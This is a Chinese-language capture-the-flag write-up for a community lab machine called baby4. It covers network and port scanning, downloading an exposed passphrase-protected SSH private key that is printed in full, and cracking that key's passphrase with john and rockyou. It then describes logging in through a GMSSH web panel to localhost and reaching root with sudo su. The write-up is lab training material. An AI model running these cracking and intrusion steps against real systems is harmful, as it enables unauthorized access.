群友靶机baby4

信息收集

┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.102  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::20c:29ff:fe66:2ae1  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:66:2a:e1  txqueuelen 1000  (Ethernet)
        RX packets 5  bytes 1543 (1.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 30  bytes 3784 (3.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8  bytes 480 (480.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8  bytes 480 (480.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:c9:f2:ac       (Unknown)
192.168.56.112  08:00:27:e0:b9:48       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.892 seconds (135.31 hosts/sec). 3 responded
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -p- 192.168.56.112
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-19 13:06 +08
Nmap scan report for 192.168.56.112
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: SSH Private Key
|_http-server-header: Apache/2.4.62 (Debian)
8080/tcp open  http    Golang net/http server
| http-title: GMSSH
|_Requested resource was /web/
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Access-Control-Allow-Headers: *
|     Access-Control-Allow-Methods: *
|     Access-Control-Allow-Origin: *
|     Content-Type: text/plain
|     Date: Sun, 19 Oct 2025 05:07:02 GMT
|     Content-Length: 18
|     page not found
|   GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 301 Moved Permanently
|     Access-Control-Allow-Headers: *
|     Access-Control-Allow-Methods: *
|     Access-Control-Allow-Origin: *
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sun, 19 Oct 2025 05:07:01 GMT
|     Content-Length: 39
|     href="/web">Moved Permanently</a>.
|   HTTPOptions: 
|     HTTP/1.0 204 No Content
|     Access-Control-Allow-Headers: *
|     Access-Control-Allow-Methods: *
|     Access-Control-Allow-Origin: *
|_    Date: Sun, 19 Oct 2025 05:07:02 GMT
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.95%I=7%D=10/19%Time=68F471F9%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,11C,"HTTP/1\.0\x20301\x20Moved\x20Permanently\r\nAccess-Contr
SF:ol-Allow-Headers:\x20\*\r\nAccess-Control-Allow-Methods:\x20\*\r\nAcces
SF:s-Control-Allow-Origin:\x20\*\r\nContent-Type:\x20text/html;\x20charset
SF:=utf-8\r\nLocation:\x20/web\r\nDate:\x20Sun,\x2019\x20Oct\x202025\x2005
SF::07:01\x20GMT\r\nContent-Length:\x2039\r\n\r\n<a\x20href=\"/web\">Moved
SF:\x20Permanently</a>\.\n\n")%r(HTTPOptions,A2,"HTTP/1\.0\x20204\x20No\x2
SF:0Content\r\nAccess-Control-Allow-Headers:\x20\*\r\nAccess-Control-Allow
SF:-Methods:\x20\*\r\nAccess-Control-Allow-Origin:\x20\*\r\nDate:\x20Sun,\
SF:x2019\x20Oct\x202025\x2005:07:02\x20GMT\r\n\r\n")%r(RTSPRequest,67,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20char
SF:set=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Four
SF:OhFourRequest,E1,"HTTP/1\.0\x20404\x20Not\x20Found\r\nAccess-Control-Al
SF:low-Headers:\x20\*\r\nAccess-Control-Allow-Methods:\x20\*\r\nAccess-Con
SF:trol-Allow-Origin:\x20\*\r\nContent-Type:\x20text/plain\r\nDate:\x20Sun
SF:,\x2019\x20Oct\x202025\x2005:07:02\x20GMT\r\nContent-Length:\x2018\r\n\
SF:r\n404\x20page\x20not\x20found")%r(Socks5,67,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectio
SF:n:\x20close\r\n\r\n400\x20Bad\x20Request")%r(GenericLines,67,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=ut
SF:f-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20ch
SF:arset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(SS
SF:LSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(SIPOptions,67,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\
SF:x20close\r\n\r\n400\x20Bad\x20Request");
MAC Address: 08:00:27:E0:B9:48 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.06 seconds
                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# curl -i http://192.168.56.112/
HTTP/1.1 200 OK
Date: Sun, 19 Oct 2025 05:08:55 GMT
Server: Apache/2.4.62 (Debian)
Last-Modified: Sun, 19 Oct 2025 03:49:08 GMT
ETag: "628-6417ad954b9f7"
Accept-Ranges: bytes
Content-Length: 1576
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SSH Private Key</title>
    <style>
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            background-color: #f8f9fa;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            color: #333;
        }
        .container {
            text-align: center;
            padding: 2rem;
            background: white;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            max-width: 90%;
        }
        h1 {
            font-weight: 400;
            margin-bottom: 1.5rem;
            font-size: 1.8rem;
        }
        .download-link {
            display: inline-block;
            padding: 0.8rem 1.5rem;
            background-color: #007bff;
            color: white;
            text-decoration: none;
            border-radius: 4px;
            transition: background-color 0.2s;
            font-size: 1.1rem;
        }
        .download-link:hover {
            background-color: #0069d9;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>This is your SSH private key</h1>
        <a href="id_rsa" class="download-link">Your Private Key</a>
    </div>
    <!-- Dont over think. the things you see is all -->
</body>
</html>
                                                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# curl -i http://192.168.56.112:8080/
HTTP/1.1 301 Moved Permanently
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: *
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Location: /web
Date: Sun, 19 Oct 2025 05:09:24 GMT
Content-Length: 39

<a href="/web">Moved Permanently</a>.

80的web页面显示是说有一个rsa的key
22端口没开，那给我ssh的密钥是何意味?

先访问80端口，得到key

然后访问8080端口，发现是一个叫GMSSH的东西，目前在GitHub上是开源的，去看看操作
https://github.com/GMSSH/GMSSH

估计就是用这个玩意来代替ssh连接了

注意到这个是私钥，而且应该是有保护的

┌──(root㉿kali)-[/home/kali]
└─# curl -sS http://192.168.56.112/id_rsa -o id_rsa
                                                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# ls
5.txt  five.txt  hydra.restore  id_rsa  url_encode.py  下载  公共  图片  文档  桌面  模板  视频  音乐
                                                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# cat id_rsa                                     
-----BEGIN OPENSSH PRIVATE KEY-----  
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBkV0CJjc  
1ZJstvEWXiQObVAAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQCjaCCHMPZ+  
Iq7pJEe1OYrbwlP/ZAczwMqoVBoJp4nLRVmPgeaMJzxVD2c11coTSESgThxrF1U2Jb/7+l  
eRmtTSgwQioDyBP5+iCcgeV0FLmAyGZpaGZ1+ww9SR63y0ru/C/IohOrCGZgt1pstCcq8q  
K0m/J6+FWufdDWWB4KNpIHI509TBYKo2OzFgvNSbI66End+hTxZxK8Qb1xSyizavoRp2z/  
VfQ+IpUYSBqTpzh0ZYBIEmTE4M5YqEnfCKqtB85c6/9iN+acNNAgkmedc2ypsR+hi7kOjB  
nu7AggGSuu+TLldJNJTpKdrti3mEEjAsbpSmwSX60XmTyHj58jZazMns6Us7ZgNO6XQbvJ  
ayYei1nNwy1RsRzbKxiyzufdL7VUXq9EH5RrfBzX42Z28crXGciAN1XjiO2L1+ndvimnW6  
iPO3fO8Lgrk+/74TN/aH8CBs3zY2/Mvtg2Tq7eznDyEh8Yy/UZxJ0oeRf1c3qaWzLc3k8P  
ncuWACZivGch8AAAWAdPgkhhYogu2byWPUYvkaHLByrpq0vdu9ipfpCbHJyYTAx6vJawJO  
vD1yekFempyOUNxkQWrprP4wIN1leLmR44YXkvTayRAC/BOJxaBUYyKRgmcHLkWhZuGbpw  
e4MiFsquxPVw5ZTPa1Jew0JpdFExNTD8/9CvK99ZBcd24U39N7FWrNmhmm7GvG+Q77eIBS  
YdjoiHlBRhLkO2OlH2TGSiJ6mQZC38J12Yp7jaeM7mIuDuUfqHJ9igH/qyKgiY9GZ1jP3M  
DXACN+5nuW+jJhkhR/5XrzL4NcCvj6D9rTFksVsqFGdgAV3/aCDlh9WsyxfBgIg2lQs40U  
3FbhWTXaaFRZU7M8l6lF7j2WzmvuexSMTqpDaP9PVALhXZVql9y5jgPIgRct+iXYY0mlvh  
oOuxeVVV7FTsPqEipb/AhvxNvzV1Rz1xBG5U1kycTKGFz/DJdDoK+PzhIp+FgtKxOwoEW3  
mzFVZr9B9XJmH6aK4PA7WbTnAGW0+ncZG2nkI1nRThy26Qba/y8qDWhW/qoaHsWUxChYs+  
6xmjlqmXdNwjBDqPdr0Iv+N+tdoirt41HyPlR98fB/DjFkNey7r8+fWBumaTZ8I2Fci+Rs  
zX4FbrhbcPebbC1C0kGjdatNMg5zdzucv1PFGaAUO422ZGCP7iDtMDgrEyhqH7AyIjkMZl  
Boo0t3ZcwkrQRzyBV148xSKpK16YyNVlVUKw7xqohs3i0Ee1R1ARTUrUdUi5tJazos8ItM  
Z/f1wYh4PxlDgIDtoZX7oYcvmYhoDM5KV01JC8oVUVm1vt0DyFJni7iPszGdBuxXV+jBn5  
v4qNyy3SEcvQbMux2I6dqTP/0ddoXtSuPRAOE0iLoumEuMleLpk/hpwaIkW73j9+WBZzAl  
Bv6chHlgqOZ9TTo/IpBTaYw7YRSjJxsY3A++sWitiE30Ibj/NKROX/YeI0fdwRjkzy0esx  
m+bbayffy0WD8JpHUGCutRKKw8z/8VJmIfWMSHPRihLj47C3X00naEILTMCm5kWn2PagGL  
+kB97l2NBkScwQlX3d4JWchJI9b3PfGaq0av4FA1ev0G1e5xmxjyLVoqSLWIbn9QkUG5xy  
2qqQ/fQw9ndVfuRohq9En7v0TkV075Fw9W8QsV7VMoPxonIlYt0ltWkrmlfi1QNGcqxZy3  
mwoc4QRbHQ/UGsU/WUkgS3sr3iQtIUAVYuDyCYChSvZOl0A/sAsQerMcifUFCGIJNM8IXL  
RGo+5WO2Fm0RF+gmbkaQKm1FDHqi0BwxWD/M/0+4uDfcA7BgP1oEc9qF/+lwj7gX+ahQ+V  
6n+tZmpVrqN55hh6OkXRTxKCoDLCYlju9iglgLJPDTt11PRkNTSvLvshUaDeh9zWYkdPwT  
3tPM+jH6a/Bz4e0grFDkC4D3Y8SCLKOYLrf1DW05RCHARdzD3VoPHiiTmY/s/spQhlpYPb  
qguUid3Q1plFCa1gWN6F4agprFa6mcUKNzTOvl2eTCR45dRNJRJ6Zi0iGEfYJoNi34T9ZH  
uoi3+yesygci3wkkbAH0vilpVmnbHWF6wLfVOQN2fLuxdayKC7rEtxws+I/QdsaOe7SaCT  
YPqw9I4yOkruhHote/gpmoynSxzSzkiAdWUOnHi9jtXU4lNe0P2W1CnUONFMeX78YHI/nD  
8XnaeFwaUh92ClLzvvMeItDufoQbXk8r51V5sscLqtNaGSpdAmVvFB6MNQHCkUSBqbJEFW  
LIVlDNKRW+ISLxO4BTg+GYUoBCt6pa7+xBktE2A9LNuKLE2WT++fZ0PTaRlI2ngMWHY7Vx  
ARnMUX01vXejtrdJZb9znPK1w/2CaFKKFaLufz0ylQwffDm2dwCTgrd279OeRrTzCQtvGJ  
lGNbkA==  
-----END OPENSSH PRIVATE KEY-----  
                                                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# chmod 600 id_rsa
                                                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# file id_rsa
id_rsa: OpenSSH private key
                                                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# chmod 644 id_rsa
                                                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# ssh-keygen -y -f id_rsa > id_rsa.pub 2>/dev/null && echo ">>> unencrypted, pub saved: id_rsa.pub" || echo ">>> private key may be passphrase-protected"
>>> private key may be passphrase-protected

验证之后果然有保护，那么就把passphrase爆破出来

┌──(root㉿kali)-[/home/kali]
└─# ssh2john id_rsa > id_rsa.hash
                                                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# ls
5.txt  five.txt  hydra.restore  id_rsa  id_rsa.hash  url_encode.py  下载  公共  图片  文档  桌面  模板  视频  音乐
                                                                                                                                         
┌──(root㉿kali)-[/home/kali]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cocacola         (id_rsa)     
1g 0:00:00:10 DONE (2025-10-19 13:43) 0.09891g/s 47.47p/s 47.47c/s 47.47C/s lover..marie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

同时丢给AI，反解出公钥，然后得到用户名

得到cocacola，然后我们尝试用ssh证书登录

发现根本没有ssh服务让我们登录，之下完犊子了，GMSSH根本上不去

我怀疑是出了bug，但是不敢问群主，万一不是这个问题的话，我估计得被骂死

询问群主之后，群主说没问题，但是我也做不出来，后面看了wp

我主要是困在了两个问题上

群主说:有ssh密钥登录的渠道并不代表我就允许你用密钥登录。

所以这题我一开始就错了，是用cocacola进行登录

我不知道要连接127.0.0.1

我一直尝试的是靶机的地址，也就是192.168.56.112

user flag

关于为什么要连接127.0.0.1，这个实在是太蠢了(我)

因为这个GMSSH服务就是跑在那个目标靶机上的，我们在目标靶机的GMSSH服务上ssh连接目标靶机本地的地址，不就是连接目标靶机本身了吗?我现在想想我当时真的是有够蠢的，连接127.0.0.1就达到了我们之前的目的

或者说，我可以直接登录靶机，账号密码都有了，直接登录不就行了

root flag

检查sudo -l

发现用户 laoge 在系统 Baby4 上已经拥有完整的 sudo 权限

那就直接sudo su，齐活了